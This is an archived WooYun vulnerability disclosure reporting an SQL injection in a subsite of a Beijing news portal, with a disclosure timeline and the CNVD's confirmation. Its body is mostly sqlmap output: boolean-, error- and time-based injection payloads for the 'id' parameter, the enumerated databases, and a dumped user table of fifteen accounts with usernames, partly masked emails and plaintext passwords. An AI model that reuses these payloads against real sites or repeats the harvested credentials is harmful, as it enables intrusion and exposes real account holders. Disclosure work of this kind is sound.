乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-05: 细节已通知厂商并且等待厂商处理中 2015-12-09: 厂商已经确认,细节仅向厂商公开 2015-12-19: 细节向核心白帽子及相关领域专家公开 2015-12-29: 细节向普通白帽子公开 2016-01-08: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
北青网另一处分站存在SQL注入
参考http://**.**.**.**/bugs/wooyun-2010-0146878注入点http://**.**.**.**/cgi/news.php?id=535910数据跟他跑的都一样如下
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=535910 AND 3090=3090 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=535910 AND (SELECT 8509 FROM(SELECT COUNT(*),CONCAT(0x3a6a776e3a,(SELECT (CASE WHEN (8509=8509) THEN 1 ELSE 0 END)),0x3a746e793a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=535910 AND SLEEP(5)---[21:16:57] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.29back-end DBMS: MySQL 5.0[21:16:57] [INFO] fetching database names[21:16:57] [INFO] the SQL query used returns 3 entries[21:16:57] [INFO] resumed: information_schema[21:16:57] [INFO] resumed: foodbq[21:16:57] [INFO] resumed: web_2_1available databases [3]:[*] foodbq[*] information_schema[*] web_2_1
dumpweb_2_1中一个表
Database: web_2_1Table: user[15 entries]+------+-------+-------+----------------+---------+----------------------+--------+----------------+---------+-----------+---------------------+---------------------+| d_id | mu_id | cu_id | nick | url_1 | email | mender | passwd | creator | published | savedatetime | createdatetime |+------+-------+-------+----------------+---------+----------------------+--------+----------------+---------+-----------+---------------------+---------------------+| 1 | 1 | 1 | xinshou2008 | <blank> | xinshou_2008@**.**.**.** | NULL | 111111 | admin | y | 2013-10-12 14:29:23 | 2013-10-12 11:46:43 || 2 | NULL | 1 | xinshou | NULL | xinshou_2009@**.**.**.** | NULL | 111111 | admin | n | NULL | 2013-10-12 12:01:35 || 3 | NULL | 1 | ? | NULL | 1180486@**.**.**.** | NULL | 111111 | admin | n | NULL | 2013-10-14 20:35:06 || 4 | NULL | 1 | Shawn | NULL | yipeng.gnu@**.**.**.** | NULL | 123456 | admin | n | NULL | 2013-10-15 18:17:06 || 5 | NULL | 1 | hzzsbbs8458426 | NULL | hzzsbbs1990 | NULL | hzzsbbs8458426 | admin | n | NULL | 2013-11-12 23:25:49 || 6 | NULL | 1 | asdfg2012 | NULL | ????989 | NULL | asdfg2012 | admin | n | NULL | 2013-11-13 06:03:06 || 7 | NULL | 1 | qbotqb817 | NULL | pzfb9pNc | NULL | qbotqb817 | admin | n | NULL | 2013-11-13 15:42:06 || 8 | NULL | 1 | zxczxc | NULL | jdgvbz163 | NULL | zxczxc | admin | n | NULL | 2013-11-13 23:48:40 || 9 | NULL | 1 | / | NULL | / | NULL | / | admin | n | NULL | 2013-11-14 15:14:53 || 10 | NULL | 1 | lilianghai | NULL | lilianghai | NULL | lilianghai | admin | n | NULL | 2013-11-16 23:00:33 || 11 | NULL | 1 | 678878 | NULL | weiquan007 | NULL | 678878 | admin | n | NULL | 2013-11-17 12:17:19 || 12 | NULL | 1 | abc123 | NULL | woshinindaye0003 | NULL | abc123 | admin | n | NULL | 2013-11-18 04:46:32 || 13 | NULL | 1 | rixhug180 | NULL | xpup4qIb | NULL | rixhug180 | admin | n | NULL | 2013-11-18 18:37:53 || 14 | NULL | 1 | bzqimc851 | NULL | mzcu0nMf | NULL | bzqimc851 | admin | n | NULL | 2013-11-19 09:02:49 || 15 | NULL | 1 | ewshke990 | NULL | oylm7xKd | NULL | ewshke990 | admin | n | NULL | 2013-11-20 05:51:45 |+------+-------+-------+----------------+---------+----------------------+--------+----------------+---------+-----------+---------------------+---------------------+
没跑完 仅证明------The End------
不会
危害等级:高
漏洞Rank:10
确认时间:2015-12-09 18:48
CNVD确认并复现所述情况,已经转由CNCERT下发给北京分中心,由其后续协调网站管理单位处置.
暂无